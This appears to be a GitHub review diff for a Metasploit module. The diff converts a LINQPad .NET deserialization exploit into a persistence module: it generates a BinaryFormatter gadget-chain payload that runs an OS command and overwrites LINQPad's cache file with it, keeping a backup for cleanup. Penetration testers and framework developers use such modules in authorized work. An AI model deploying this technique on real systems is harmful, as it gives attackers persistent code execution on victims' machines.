rapid7 · msutovsky-r7 · Sep 26, 2025 · Sep 28, 2025 · Sep 30, 2025 · Sep 30, 2025
diff --git a/.../windows/local/linqpad_deserialization.md → ...ws/persistence/linqpad_deserialization.md b/.../windows/local/linqpad_deserialization.md → ...ws/persistence/linqpad_deserialization.md
diff --git a/...al/linqpad_deserialization_persistence.rb → ...ce/linqpad_deserialization_persistence.rb b/...al/linqpad_deserialization_persistence.rb → ...ce/linqpad_deserialization_persistence.rb
@@ -8,10 +8,13 @@ class MetasploitModule < Msf::Exploit::Local
 
   # includes file?, directory?
   include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
 
   # includes generate
   include Msf::Util::DotNetDeserialization
 
+  prepend Msf::Exploit::Remote::AutoCheck
+
   def initialize(info = {})
     super(
       update_info(
@@ -45,37 +48,43 @@ def initialize(info = {})
     register_options([
       OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']),
       OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']),
-      OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish'])
     ])
   end
 
   # Simplify pulling the writable directory variable
 
   def check
-    if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH'])
-      return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist')
+    if datastore['LINQPAD_FILE'].blank? || !file?(datastore['LINQPAD_FILE'])
+      return Exploit::CheckCode::Safe('LINQPad binary not specified or doesn\'t exist')
     elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
       return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist')
     elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat')
       return Exploit::CheckCode::Unknown('Cannot find cache file')
     elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat')
       return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad')
     else
-      return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable')
+      return Exploit::CheckCode::Appears('LINQPad and vulnerable cache file present, target possibly exploitable')
     end
   end
 
-  def exploit
+  def install_persistence
     # generate payload
+    vprint_status('Create deserialization payload')
+
     dotnet_payload = ::Msf::Util::DotNetDeserialization.generate(
       payload.encoded, # this is the Operating System command to run
       gadget_chain: :TextFormattingRunProperties,
       formatter: :BinaryFormatter
     )
+    vprint_status('Saving the original content')
+    cached_file_content = read_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat')
+    backup_conf_path = store_loot(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', 'text/plain', session, cached_file_content, 'AutoRefCached46.1.dat', 'autorefcache46.1.dat backup')
+    vprint_status("Saved at: #{backup_conf_path}")
+
+    @clean_up_rc << "upload #{backup_conf_path} #{datastore['CACHE_PATH']}/AutoRefCache46.1.dat"
+
+    vprint_status('Overwriting file')
     # try to overwrite cache file
     fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload)
-
-    # add cleanup option
-    register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP']
   end
 end